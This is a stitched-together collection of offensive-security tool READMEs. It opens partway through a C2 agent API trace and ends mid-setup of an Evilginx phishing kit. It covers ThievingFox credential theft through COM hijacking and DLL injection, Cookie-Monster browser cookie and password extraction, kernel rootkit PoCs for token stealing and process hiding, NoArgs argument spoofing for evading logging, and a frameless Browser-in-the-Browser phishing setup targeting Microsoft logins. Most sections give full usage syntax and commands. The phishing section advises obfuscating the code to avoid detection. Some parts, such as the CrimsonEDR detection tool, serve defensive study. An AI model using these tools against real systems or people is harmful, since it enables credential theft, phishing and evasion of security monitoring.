- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)
[...]
Tracing multiple functions in the DeimosC2 framework agent:
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57 )
[...]
The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.
Detection | Description |
---|---|
Direct Syscall | Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks. |
NTDLL Unhooking | Identifies attempts to unhook functions within the NTDLL library, a common evasion technique. |
AMSI Patch | Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis. |
ETW Patch | Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection. |
PE Stomping | Identifies instances of PE (Portable Executable) stomping. |
Reflective PE Loading | Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis. |
Unbacked Thread Origin | Identifies threads originating from unbacked memory regions, often indicative of malicious activity. |
Unbacked Thread Start Address | Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection. |
API hooking | Places a hook on the NtWriteVirtualMemory function to monitor memory modifications. |
Custom Pattern Search | Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures. |
To get started with CrimsonEDR, follow these steps:
bash sudo apt-get install gcc-mingw-w64-x86-64
bash git clone https://github.com/Helixo32/CrimsonEDR
bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.
To use CrimsonEDR, follow these steps:
ioc.json
file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\
, the DLL will look for ioc.json
in C:\Users\admin\ioc.json
. Currently, ioc.json
contains patterns related to msfvenom
. You can easily add your own in the following format:{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
Execute CrimsonEDRPanel.exe
with the following arguments:
-d <path_to_dll>
: Specifies the path to the CrimsonEDR.dll
file.
-p <process_id>
: Specifies the Process ID (PID) of the target process where you want to inject the DLL.
For example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
Here are some useful resources that helped in the development of this project:
For questions, feedback, or support, please reach out to me via:
PoCs for Kernelmode rootkit techniques research or education. Currently focusing on Windows OS. All modules support 64bit OS only.
NOTE
Some modules use
ExAllocatePool2
API to allocate kernel pool memory.ExAllocatePool2
API is not supported in OSes older than Windows 10 Version 2004. If you want to test the modules in old OSes, replaceExAllocatePool2
API withExAllocatePoolWithTag
API.
ย
All modules are tested in Windows 11 x64. To test drivers, following options can be used for the testing machine:
debugging-in-windbg--cdb--or-ntsd">Setting Up Kernel-Mode Debugging
Each options require to disable secure boot.
Detailed information is given in README.md in each project's directories. All modules are tested in Windows 11.
Module Name | Description |
---|---|
BlockImageLoad | PoCs to block driver loading with Load Image Notify Callback method. |
BlockNewProc | PoCs to block new process with Process Notify Callback method. |
CreateToken | PoCs to get full privileged SYSTEM token with ZwCreateToken() API. |
DropProcAccess | PoCs to drop process handle access with Object Notify Callback. |
GetFullPrivs | PoCs to get full privileges with DKOM method. |
GetProcHandle | PoCs to get full access process handle from kernelmode. |
InjectLibrary | PoCs to perform DLL injection with Kernel APC Injection method. |
ModHide | PoCs to hide loaded kernel drivers with DKOM method. |
ProcHide | PoCs to hide process with DKOM method. |
ProcProtect | PoCs to manipulate Protected Process. |
QueryModule | PoCs to perform retrieving kernel driver loaded address information. |
StealToken | PoCs to perform token stealing from kernelmode. |
More PoCs especially about following things will be added later:
Pavel Yosifovich, Windows Kernel Programming, 2nd Edition (Independently published, 2023)
Reversing-<a href=" https:="" title="Obfuscation">Obfuscation/dp/1502489309">Bruce Dang, Alexandre Gazet, Elias Bachaalany, and Sรฉbastien Josse, Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation (Wiley Publishing, 2014)
Evasion-Corners/dp/144962636X">Bill Blunden, The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System, 2nd Edition (Jones & Bartlett Learning, 2012)
Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
make
to compile exe on windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.
The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW
. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.
Hooking into CreateProcessW
is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW
, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.
The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.
Process Hacker View:
Process Monitor View:
Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)
Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW
function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.
Custom Process Creation Function: Upon intercepting a CreateProcessW
call, the custom function is executed, creating the new process and manipulating its arguments as necessary.
PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.
Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.
Option 1: Compile NoArgs DLL:
You will need microsoft/Detours">Microsoft Detours installed.
Compile the DLL.
Option 2: Download the compiled executable (ready-to-go) from the releases page.
A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.
This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.
Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. โถ Watch Video
โ๏ธ Buy Me A Coffee
This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.
Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.
That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.
The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.
In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.
A Browser In The Browser (BITB) without any iframes! As simple as that.
Meaning that we can now use BITB with Evilginx on websites like Microsoft.
Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.
Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)
Update and Upgrade system packages:
sudo apt update && sudo apt upgrade -y
Create a new evilginx user, and add user to sudo group:
sudo su
adduser evilginx
usermod -aG sudo evilginx
Test that evilginx user is in sudo group:
su - evilginx
sudo ls -la /root
Navigate to users home dir:
cd /home/evilginx
(You can do everything as sudo user as well since we're running everything locally)
Download and build Evilginx: Official Docs
Copy Evilginx files to /home/evilginx
Install Go: Official Docs
wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile
ADD: export PATH=$PATH:/usr/local/go/bin
source ~/.profile
Check:
go version
Install make:
sudo apt install make
Build Evilginx:
cd /home/evilginx/evilginx2
make
Create a new directory for our evilginx build along with phishlets and redirectors:
mkdir /home/evilginx/evilginx
Copy build, phishlets, and redirectors:
cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx
cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors
cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets
Ubuntu firewall quick fix (thanks to @kgretzky)
sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx
On Ubuntu, if you get Failed to start nameserver on: :53
error, try modifying this file
sudo nano /etc/systemd/resolved.conf
edit/add the DNSStubListener
to no
> DNSStubListener=no
then
sudo systemctl restart systemd-resolved
Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.
nano ~/.evilginx/config.json
CHANGE https_port
from 443
to 8443
Install Apache2:
sudo apt install apache2 -y
Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat
Start and enable Apache:
sudo systemctl start apache2
sudo systemctl enable apache2
Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.
Install git if not already available:
sudo apt -y install git
Clone this repo:
git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb
Make directories for the pages we will be serving:
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary
Copy the directories for each page:
sudo cp -r ./pages/home/ /var/www/
sudo cp -r ./pages/primary/ /var/www/
sudo cp -r ./pages/secondary/ /var/www/
Optional: Remove the default Apache page (not used):
sudo rm -r /var/www/html/
Copy the O365 phishlet to phishlets directory:
sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml
Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js
and change the CALENDLY_PAGE_NAME
and CALENDLY_EVENT_TYPE
.
Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html
in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.
Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.
We will use the domain fake.com
which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)
Create dir and parents if they do not exist:
sudo mkdir -p /etc/ssl/localcerts/fake.com/
Generate the SSL certs using the OpenSSL config file:
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf
Modify private key permissions:
sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem
Copy custom substitution files (the core of our approach):
sudo cp -r ./custom-subs /etc/apache2/custom-subs
Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.
Both config files under /apache-configs/
are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)
# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf
Simply to make it easier, I included both versions as separate files for this next step.
Windows/Chrome BITB:
sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Mac/Chrome BITB:
sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf
Test Apache configs to ensure there are no errors:
sudo apache2ctl configtest
Restart Apache to apply changes:
sudo systemctl restart apache2
Get the IP of the VM using ifconfig
and note it somewhere for the next step.
We now need to add new entries to our hosts file, to point the domain used in this demo fake.com
and all used subdomains to our VM on which Apache and Evilginx are running.
On Windows:
Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)
Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:
C:\Windows\System32\drivers\etc\
Change the file types (bottom-right) to "All files".
Double-click the file named hosts
On Mac:
Open a terminal and run the following:
sudo nano /private/etc/hosts
Now modify the following records (replace [IP]
with the IP of your VM) then paste the records at the end of the hosts file:
# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section
Save and exit.
Now restart your browser before moving to the next step.
Note: On Mac, use the following command to flush the DNS cache:
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME]
but remember to replace the 127.0.0.1
with the actual local IP of your VM.
Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com
so we need to make our host machine trust the certificate authority that signed the SSL certs.
For this step, it's easier to follow the video instructions, but here is the gist anyway.
Open https://fake.com/ in your Chrome browser.
Ignore the Unsafe Site warning and proceed to the page.
Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.
Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".
On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust
Now RESTART your Browser
You should be able to visit https://fake.com
now and see the homepage without any SSL warnings.
At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.
Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)
sudo apt install tmux -y
Start Evilginx in developer mode (using tmux to avoid losing the session):
tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer
(To re-attach to the tmux session use tmux attach-session -t evilginx
)
Evilginx Config:
config domain fake.com
config ipv4 127.0.0.1
IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.
blacklist noadd
Setup Phishlet and Lure:
phishlets hostname O365 fake.com
phishlets enable O365
